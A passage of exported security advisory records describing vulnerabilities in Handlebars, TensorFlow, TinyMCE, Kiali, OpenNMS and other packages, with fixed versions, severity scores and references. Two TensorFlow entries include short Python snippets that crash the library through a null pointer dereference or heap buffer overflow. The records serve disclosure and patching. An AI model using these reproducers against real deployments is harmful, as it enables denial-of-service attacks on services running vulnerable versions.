[{'introduced': '0'}, {'fixed': '4.7.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.bowergithub.wycats:handlebars.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23369'}, {'type': 'WEB', 'url': 'https://github.com/handlebars-lang/handlebars.js/commit/b6d3de7123eebba603e321f04afdbae608e8fea8'}, {'type': 'WEB', 'url': 'https://github.com/handlebars-lang/handlebars.js/commit/f0589701698268578199be25285b2ebea1c1e427'}, {'type': 'PACKAGE', 'url': 'https://github.com/wycats/handlebars.js'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210604-0008/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074950'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074951'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074952'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HANDLEBARS-1056767'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T22:07:10Z', 'nvd_published_at': '2021-04-12T14:15:00Z'}" +1.4.0,GHSA-v52p-hfjf-wg88,2021-05-17T22:34:01Z,2021-05-21T14:27:54Z,,['CVE-2021-29597'],Division by zero in TFLite's implementation of `SpaceToBatchNd`,"### Impact +The implementation of the `SpaceToBatchNd` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/412c7d9bb8f8a762c5b266c9e73bfa165f29aac8/tensorflow/lite/kernels/space_to_batch_nd.cc#L82-L83): + +```cc +TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); +output_size->data[dim + 1] = final_dim_size / block_shape[dim]; +``` + +An attacker can craft a model such that one dimension of the `block` input is 0. Hence, the corresponding value in `block_shape` is 0. + +### Patches +We have patched the issue in GitHub commit [6d36ba65577006affb272335b7c1abd829010708](https://github.com/tensorflow/tensorflow/commit/6d36ba65577006affb272335b7c1abd829010708). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-v52p-hfjf-wg88'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29597'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/6d36ba65577006affb272335b7c1abd829010708'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:34:01Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-p7j5-4mwm-hv86,2023-06-27T16:50:42Z,2021-05-06T17:28:14Z,2023-06-27T16:40:59Z,[],Duplicate Advisory: Cross-site scripting in TinyMCE,"## Duplicate Advisory +This advisory has been withdrawn because it is a duplicate of GHSA-27gm-ghr9-4v95. This link is maintained to preserve external references. + +## Original Description +TinyMCE before 4.9.7 and 5.x before 5.1.4 allows XSS in the core parser, the paste plugin, and the visualchars plugin by using the clipboard or APIs to insert content into the editor.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.9.7'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.1.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/security/advisories/GHSA-27gm-ghr9-4v95'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17480'}, {'type': 'WEB', 'url': 'https://www.tiny.cloud/docs/release-notes/release-notes514/#securityfixes'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T22:23:10Z', 'nvd_published_at': '2020-08-10T20:15:00Z'}" +1.4.0,GHSA-hc6c-75p4-hmq4,2021-05-18T23:39:11Z,2021-05-21T14:20:54Z,,['CVE-2021-29515'],Reference binding to null pointer in `MatrixDiag*` ops,"### Impact +The implementation of [`MatrixDiag*` operations](https://github.com/tensorflow/tensorflow/blob/4c4f420e68f1cfaf8f4b6e8e3eb857e9e4c3ff33/tensorflow/core/kernels/linalg/matrix_diag_op.cc#L195-L197) does not validate that the tensor arguments are non-empty: + +```cc + num_rows = context->input(2).flat()(0); + num_cols = context->input(3).flat()(0); + padding_value = context->input(4).flat()(0); +``` + +Thus, users can trigger null pointer dereferences if any of the above tensors are null: + +```python +import tensorflow as tf + +d = tf.convert_to_tensor([],dtype=tf.float32) +p = tf.convert_to_tensor([],dtype=tf.float32) +tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) +``` + +Changing from `tf.raw_ops.MatrixDiagV2` to `tf.raw_ops.MatrixDiagV3` still reproduces the issue. + +### Patches +We have patched the issue in GitHub commit [a7116dd3913c4a4afd2a3a938573aa7c785fdfc6](https://github.com/tensorflow/tensorflow/commit/a7116dd3913c4a4afd2a3a938573aa7c785fdfc6). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ye Zhang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hc6c-75p4-hmq4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29515'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a7116dd3913c4a4afd2a3a938573aa7c785fdfc6'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:39:11Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-m647-5wf9-3jp3,2023-09-06T19:55:21Z,2021-05-07T16:16:06Z,,['CVE-2020-7603'],OS Command Injection in closure-compiler-stream,closure-compiler-stream through 0.1.15 allows execution of arbitrary commands. The argument `options` of the exports function in `index.js` can be controlled by users without any sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'closure-compiler-stream'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7603'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CLOSURECOMPILERSTREAM-560123'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T21:51:00Z', 'nvd_published_at': '2020-03-15T22:15:00Z'}" +1.4.0,GHSA-ffhg-7mh4-33c4,2023-02-16T00:14:18Z,2021-05-18T15:29:31Z,,['CVE-2020-9283'],Improper Verification of Cryptographic Signature in golang.org/x/crypto,"golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'golang.org/x/crypto'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20200220183623-bac4c82f6975'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9283'}, {'type': 'WEB', 'url': 'https://github.com/golang/crypto/commit/bac4c82f69751a6dd76e702d54b3ceb88adab236'}, {'type': 'PACKAGE', 'url': 'https://github.com/golang/crypto'}, {'type': 'WEB', 'url': 'https://go.dev/cl/220357'}, {'type': 'WEB', 'url': 'https://go.googlesource.com/crypto/+/bac4c82f69751a6dd76e702d54b3ceb88adab236'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/golang-announce/3L45YRc91SY'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/golang-announce/c/3L45YRc91SY'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/10/msg00014.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/11/msg00027.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/11/msg00031.html'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0012'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/48121'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/156480/Go-SSH-0.0.2-Denial-Of-Service.html'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:02:30Z', 'nvd_published_at': '2020-02-20T20:15:00Z'}" +1.4.0,GHSA-7cqx-92hp-x6wh,2021-05-18T18:23:59Z,2021-05-21T14:26:16Z,,['CVE-2021-29576'],Heap buffer overflow in `MaxPool3DGradGrad`,"### Impact +The implementation of `tf.raw_ops.MaxPool3DGradGrad` is vulnerable to a heap buffer overflow: + +```python +import tensorflow as tf + +values = [0.01] * 11 +orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) +orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) +grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) +ksize = [1, 1, 1, 1, 1] +strides = [1, 1, 1, 1, 1] +padding = ""SAME"" + +tf.raw_ops.MaxPool3DGradGrad( + orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, + strides=strides, padding=padding) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/596c05a159b6fbb9e39ca10b3f7753b7244fa1e9/tensorflow/core/kernels/pooling_ops_3d.cc#L694-L696) does not check that the initialization of `Pool3dParameters` completes successfully: + +```cc +Pool3dParameters params{context, ksize_, stride_, + padding_, data_format_, tensor_in.shape()}; +``` + +Since [the constructor](https://github.com/tensorflow/tensorflow/blob/596c05a159b6fbb9e39ca10b3f7753b7244fa1e9/tensorflow/core/kernels/pooling_ops_3d.cc#L48-L88) uses `OP_REQUIRES` to validate conditions, the first assertion that fails interrupts the initialization of `params`, making it contain invalid data. In turn, this might cause a heap buffer overflow, depending on default initialized values. + +### Patches +We have patched the issue in GitHub commit [63c6a29d0f2d692b247f7bf81f8732d6442fad09](https://github.com/tensorflow/tensorflow/commit/63c6a29d0f2d692b247f7bf81f8732d6442fad09). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7cqx-92hp-x6wh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29576'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/63c6a29d0f2d692b247f7bf81f8732d6442fad09'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T18:23:59Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-79jw-6wg7-r9g4,2021-05-07T21:13:59Z,2021-05-06T15:45:39Z,,['CVE-2021-29491'],Use of Potentially Dangerous Function in mixme,"### Impact + +In Node.js mixme v0.5.0, an attacker can add or alter properties of an object via 'proto' through the mutate() and merge() functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service (DoS). + +### Patches +The problem is corrected starting with version 0.5.1. + +### References +Issue: https://github.com/adaltas/node-mixme/issues/1 +Commit: https://github.com/adaltas/node-mixme/commit/cfd5fbfc32368bcf7e06d1c5985ea60e34cd4028 + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mixme'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/adaltas/node-mixme/security/advisories/GHSA-79jw-6wg7-r9g4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29491'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210622-0002/'}]","{'cwe_ids': ['CWE-913'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:39:38Z', 'nvd_published_at': '2021-05-06T13:15:00Z'}" +1.4.0,GHSA-64rh-r86q-75ff,2021-05-06T21:51:32Z,2021-05-18T18:28:59Z,,['CVE-2020-1764'],Hard coded cryptographic key in Kiali,"A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/kiali/kiali'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.1'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/kiali/kiali/config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.0-snapshot.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.16.0-snapshot.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1764'}, {'type': 'WEB', 'url': 'https://github.com/kiali/kiali/commit/93f5cd0b6698e8fe8772afb8f35816f6c086aef1'}, {'type': 'WEB', 'url': 'https://github.com/kiali/kiali/commit/ac7bd6c7ddb2e01356e21d360dd1c718a90706ad'}, {'type': 'WEB', 'url': 'https://github.com/kiali/kiali/commit/ce48af57113c805a25179aaab1a0fac2fb93653f'}, {'type': 'WEB', 'url': 'https://github.com/kiali/kiali/commit/faed1f5f90efae3df9fd6fb793f00ccc242b3a96'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1810383'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1764'}, {'type': 'WEB', 'url': 'https://github.com/jpts/cve-2020-1764-poc'}, {'type': 'WEB', 'url': 'https://kiali.io/news/security-bulletins/kiali-security-001/'}]","{'cwe_ids': ['CWE-321', 'CWE-798'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T21:51:32Z', 'nvd_published_at': None}" +1.4.0,GHSA-j9pj-hx76-92v6,2021-04-21T20:55:27Z,2021-05-10T18:38:21Z,,['CVE-2020-7739'],Server-Side Request Forgery in phantomjs-seo,This affects all versions of package phantomjs-seo. It is possible for an attacker to craft a url that will be passed to a PhantomJS instance allowing for an SSRF attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'phantomjs-seo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7739'}, {'type': 'WEB', 'url': 'https://github.com/areverberi/phantomjs-seo/blob/083f66892f97d67031668decb917389ffc32a94c/index.js%23L17'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PHANTOMJSSEO-609638'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/phantomjs-seo'}]","{'cwe_ids': ['CWE-20', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T20:55:27Z', 'nvd_published_at': '2020-10-06T15:15:00Z'}" +1.4.0,GHSA-p63h-7hw8-5cw4,2021-05-28T22:25:41Z,2021-05-25T18:46:49Z,,['CVE-2021-25930'],Cross-Site Request Forgery in OpenNMS Horizon,"In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '27.1.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-config'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '27.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25930'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/607151ea8f90212a3fb37c977fa57c7d58d26a84'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/eb08b5ed4c5548f3e941a1f0d0363ae4439fa98c'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25930'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T17:25:55Z', 'nvd_published_at': '2021-05-20T14:15:00Z'}" +1.4.0,GHSA-7w8j-85wm-6xfq,2021-05-20T22:53:36Z,2021-05-24T19:51:58Z,,['CVE-2021-20086'],Prototype Pollution in jquery-bbq,Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in jquery-bbq 1.2.1 allows a malicious user to inject properties into Object.prototype.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery-bbq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20086'}, {'type': 'WEB', 'url': 'https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/jquery-bbq.md'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T22:53:36Z', 'nvd_published_at': '2021-04-23T19:15:00Z'}" +1.4.0,GHSA-2v6x-frw8-7r7f,2021-05-17T21:04:15Z,2021-05-18T15:38:54Z,,['CVE-2019-17110'],Exposure of Sensitive Information to an Unauthorized Actor in kube-state-metrics,"A security issue was discovered in kube-state-metrics 1.7.x before 1.7.2. An experimental feature was added to v1.7.0 and v1.7.1 that enabled annotations to be exposed as metrics. By default, kube-state-metrics metrics only expose metadata about Secrets. However, a combination of the default kubectl behavior and this new feature can cause the entire secret content to end up in metric labels, thus inadvertently exposing the secret content in metrics.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/kubernetes/kube-state-metrics'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-17110'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kube-state-metrics/commit/03122fe3e2df49a9a7298b8af921d3c37c430f7f'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kube-state-metrics/commit/2a9ab3a9a0f1c4dbecb6a5577185b33bfac86a96'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kube-state-metrics/releases/tag/v1.7.2'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:04:15Z', 'nvd_published_at': None}" +1.4.0,GHSA-jq7p-26h5-w78r,2022-10-31T15:57:25Z,2021-05-18T15:32:04Z,,['CVE-2019-0210'],Out-of-bounds read in Apache Thrift,"In Apache Thrift 0.9.3 to 0.12.0, a server implemented in Go using TJSONProtocol or TSimpleJSONProtocol may panic when feed with invalid input data.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/apache/thrift'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.3'}, {'fixed': '0.13.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0210'}, {'type': 'WEB', 'url': 'https://github.com/apache/thrift/commit/264a3f318ed3e9e51573f67f963c8509786bcec2'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0804'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0805'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0806'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0811'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/thrift'}, {'type': 'WEB', 'url': 'https://github.com/apache/thrift/blob/master/CHANGES.md#0130'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2832722c31d78bef7526e2c701ba4b046736e4c851473194a247392f@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r36581cc7047f007dd6aadbdd34e18545ec2c1eb7ccdae6dd47a877a9@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 